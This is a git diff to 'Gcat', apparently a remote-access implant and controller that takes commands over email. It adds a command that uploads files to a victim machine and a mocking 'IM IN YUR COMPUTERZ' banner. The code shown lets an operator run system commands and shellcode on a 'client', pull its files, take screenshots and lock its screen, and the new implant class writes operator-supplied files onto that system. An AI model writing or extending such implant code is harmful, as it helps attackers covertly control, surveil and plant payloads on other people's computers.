diff --git a/README.md b/README.md index 9871bd7..e99d80b 100644 --- a/README.md +++ b/README.md @@ -88,5 +88,5 @@ To Do ===== - Multi-platform support -- Command to upload files +- ~~Command to upload files~~ - Transport crypto & obfuscation diff --git a/gcat.py b/gcat.py index d7c960e..70de8b2 100644 --- a/gcat.py +++ b/gcat.py @@ -12,6 +12,7 @@ from datetime import datetime from base64 import b64decode from smtplib import SMTP +from argparse import RawTextHelpFormatter from email.MIMEMultipart import MIMEMultipart from email.MIMEBase import MIMEBase from email.MIMEText import MIMEText @@ -168,7 +169,40 @@ def logout(): if __name__ == '__main__': - parser = argparse.ArgumentParser(description="Gcat", version='0.0.1') + parser = argparse.ArgumentParser(description=""" + dP + 88 + .d8888b. .d8888b. .d8888b. d8888P + 88' `88 88' `"" 88' `88 88 + 88. .88 88. ... 88. .88 88 + `8888P88 `88888P' `88888P8 dP + .88 + d8888P + + + .__....._ _.....__, + .": o :': ;': o :". + `. `-' .'. .'. `-' .' + `---' `---' + + _...----... ... ... ...----..._ + .-'__..-''---- `. `"` .' ----'''-..__`-. + '.-' _.--''' `-._.-' ''''--._ `-.` + ' .-"' : `"-. ` + ' `. _.'"'._ .' ` + `. ,.-'" "'-., .' + `. .' + jgs `-._ _.-' + `"'--...___...--'"` + + ...IM IN YUR COMPUTERZ... + + WATCHIN YUR SCREENZ +""", + version='1.0.0', + formatter_class=RawTextHelpFormatter, + epilog='Meow!') + parser.add_argument("-id", dest='id', type=str, default=None, help="Client to target") parser.add_argument('-jobid', dest='jobid', default=None, type=str, help='Job id to retrieve') @@ -181,6 +215,7 @@ def logout(): slogopts = sgroup.add_mutually_exclusive_group() slogopts.add_argument("-cmd", metavar='CMD', dest='cmd', type=str, help='Execute a system command') slogopts.add_argument("-download", metavar='PATH', dest='download', type=str, help='Download a file from a clients system') + slogopts.add_argument("-upload", nargs=2, metavar=('SRC', 'DST'), help="Upload a file to the clients system") slogopts.add_argument("-exec-shellcode", metavar='FILE',type=argparse.FileType('rb'), dest='shellcode', help='Execute supplied shellcode on a client') slogopts.add_argument("-screenshot", dest='screen', action='store_true', help='Take a screenshot') slogopts.add_argument("-lock-screen", dest='lockscreen', action='store_true', help='Lock the clients screen') @@ -212,6 +247,9 @@ def logout(): elif args.download: gcat.sendEmail(args.id, jobid, 'download', r'{}'.format(args.download)) + elif args.upload: + gcat.sendEmail(args.id, jobid, 'upload', r'{}'.format(args.upload[1]), [args.upload[0]]) + elif args.screen: gcat.sendEmail(args.id, jobid, 'screenshot') diff --git a/implant.py b/implant.py index 5ebc6c7..459ba22 100644 --- a/implant.py +++ b/implant.py @@ -16,6 +16,7 @@ #import logging #from traceback import print_exc, format_exc +from base64 import b64decode from smtplib import SMTP from email.MIMEMultipart import MIMEMultipart from email.MIMEBase import MIMEBase @@ -377,6 +378,25 @@ def run(self): except Exception as e: sendEmail({'cmd': 'download', 'res': 'Failed: {}'.format(e)}, self.jobid) +class upload(threading.Thread): + + def __init__(self, jobid, dest, attachment): + threading.Thread.__init__(self) + self.jobid = jobid + self.dest = dest + self.attachment = attachment + + self.daemon = True + self.start() + + def run(self): + try: + with open(self.dest, 'wb') as fileh: + fileh.write(b64decode(self.attachment)) + sendEmail({'cmd': 'upload', 'res': 'Success'}, self.jobid) + except Exception as e: + sendEmail({'cmd': 'upload', 'res': 'Failed: {}'.format(e)}, self.jobid) + class lockScreen(threading.Thread): def __init__(self, jobid): @@ -560,9 +580,12 @@ def checkJobs(): elif cmd == 'download': download(jobid, arg) + elif cmd == 'upload': + upload(jobid, arg, msg.attachment) + elif cmd == 'screenshot': screenshot(jobid) - + elif cmd == 'cmd': execCmd(arg, jobid)